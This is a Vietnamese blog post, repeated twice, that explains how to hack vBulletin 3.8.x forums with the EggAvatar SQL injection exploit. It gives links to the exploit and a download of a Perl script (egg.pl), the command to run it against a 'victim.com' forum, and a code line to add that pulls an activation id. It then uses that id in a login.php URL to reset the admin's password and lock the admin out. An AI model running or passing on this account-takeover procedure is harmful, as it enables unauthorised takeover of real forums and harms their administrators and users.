Chủ Nhật, 12 tháng 8, 2012
Hack Vbb SQLinject 3.8.x
Hack Vbb SQLinject 3.8.x
http://www.exploit-db.com/exploits/16934/
http://www.mediafire.com/?mf4kxglr12omrja
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
Tool : Perl active
Lưu exploit : -> egg.pl
Reg 1 nick trong forum :
user:xxx
pass:yyy
Run Perl
egg.pl http://victim.com/forum xxx yyy 3 3
3 : userid
3 :sleeptime
Thêm dòng này trên dòng 19 ,để lấy activation email > reset password
print v_request('Activationid: ','activationid','useractivation','userid='.$2);
Chạy trên trỉnh duyệt:
http://victim.com/forum/login.php?a=pwd&u=1&i=abcdef.....
1=userid
abcdef.....=activation
Khi forgot ,hệ thống gửi về email của admin 1 cái ljnk xác nhận forgot pass
Cái ljnk ấy tức là cái ljnk ta đang chạy trên trình duyệt
Nó tiếp tục gửi pass về email của admin (lúc này admin đăng nhập pass củ ko đc)
Tuy có thể crack pass nhưng cơ hội khá khó khăn !
Chỉ changes pass admin nó được thôi
http://www.exploit-db.com/exploits/16934/
http://www.mediafire.com/?mf4kxglr12omrja
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
Tool : Perl active
Lưu exploit : -> egg.pl
Reg 1 nick trong forum :
user:xxx
pass:yyy
Run Perl
egg.pl http://victim.com/forum xxx yyy 3 3
3 : userid
3 :sleeptime
Thêm dòng này trên dòng 19 ,để lấy activation email > reset password
print v_request('Activationid: ','activationid','useractivation','userid='.$2);
Chạy trên trỉnh duyệt:
http://victim.com/forum/login.php?a=pwd&u=1&i=abcdef.....
1=userid
abcdef.....=activation
Khi forgot ,hệ thống gửi về email của admin 1 cái ljnk xác nhận forgot pass
Cái ljnk ấy tức là cái ljnk ta đang chạy trên trình duyệt
Nó tiếp tục gửi pass về email của admin (lúc này admin đăng nhập pass củ ko đc)
Tuy có thể crack pass nhưng cơ hội khá khó khăn !
Chỉ changes pass admin nó được thôi
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: